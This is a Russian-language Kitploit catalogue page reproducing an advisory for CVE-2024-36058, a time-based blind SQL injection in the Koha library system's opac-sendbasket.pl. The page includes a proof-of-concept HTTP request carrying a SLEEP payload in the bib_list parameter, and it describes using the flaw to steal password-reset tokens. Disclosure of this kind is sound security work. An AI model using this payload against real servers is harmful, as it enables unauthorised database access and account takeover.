Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36058 — Proof-of-concept эксплойт и advisory для CVE-2024-36058 — time-based blind SQL-инъекции в opac-sendbasket.pl библиотечного ПО Koha, позволяющей аутентифицированному перечислению базы данных. | Kitploit
Инструменты/GitHubGitHub/hacklantic/cve-2024-36058
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubhacklantic/cve-2024-36058

CVE-2024-36058

Proof-of-concept эксплойт и advisory для CVE-2024-36058 — time-based blind SQL-инъекции в opac-sendbasket.pl библиотечного ПО Koha, позволяющей аутентифицированному перечислению базы данных.

Репозиторий
720 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36058 — Koha Library Software < 22.05.22 — Time-Based Blind SQL Injection

CVE ID: CVE-2024-36058
Продукт: Koha Library Software
Тип уязвимости: Time-Based Blind SQL Injection (CWE-89)
Оценка CVSS: 8.1 (Высокая) Требуется аутентификация
Затронутые версии: Ниже 22.05.22
Автор: Karolis Narvilas


Описание

Koha — это открытая интегрированная библиотечная система. Уязвимость типа time-based blind SQL injection существует в функциональности «Send Basket» по адресу opac/opac-sendbasket.pl. Параметр bib_list передается без санитизации в SQL-запрос, что позволяет атакующему внедрять произвольные SQL-нагрузки, вызывающие измеримые задержки в ответе сервера.

Обычный (с низкими привилегиями) библиотечный пользователь может использовать эту уязвимость без каких-либо повышенных разрешений. Используя различия во времени ответа, атакующий может перечислить содержимое базы данных и получить данные, доступ к которым должен быть ограничен привилегированным доступом.

Воздействие: удаленный аутентифицированный атакующий может использовать CVE-2024-36058 для перечисления конфиденциального содержимого базы данных, включая эксплуатацию процесса сброса пароля и получение токенов сброса пароля для других учетных записей пользователей с целью их захвата, что приводит к несанкционированному доступу и потенциальному раскрытию данных.


Proof-of-Concept (PoC)

  1. Войдите в Koha как пользователь с низкими привилегиями / обычный библиотечный пользователь.
  2. Добавьте книгу в корзину, затем нажмите «Send Basket».

Send Basket

  1. Перехватите полученный запрос с помощью такого прокси, как Burp Suite, и внедрите нагрузку в параметр bib_list, как показано ниже:

Запрос:

root@kitploit:~
POST /cgi-bin/koha/opac-sendbasket.pl HTTP/1.1
Host: {domain}
Cookie: [Low Privilege Session]
-- SNIP --

email_add=<recipient>&comment=x&bib_list=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(36)))x)--+-&csrf_token=<csrf_token>

  1. Внедренная нагрузка заставляет базу данных «засыпать» перед возвратом ответа. В этом примере сервер «спал» ~36 секунд, что подтверждает, что точка внедрения эксплуатируема.

SQLi Sleep PoC


Ссылки

  • Koha Community - Release Notes for v22.05.22
  • MITRE - CVE-2024-36058
  • Hacklantic
Скачать инструмент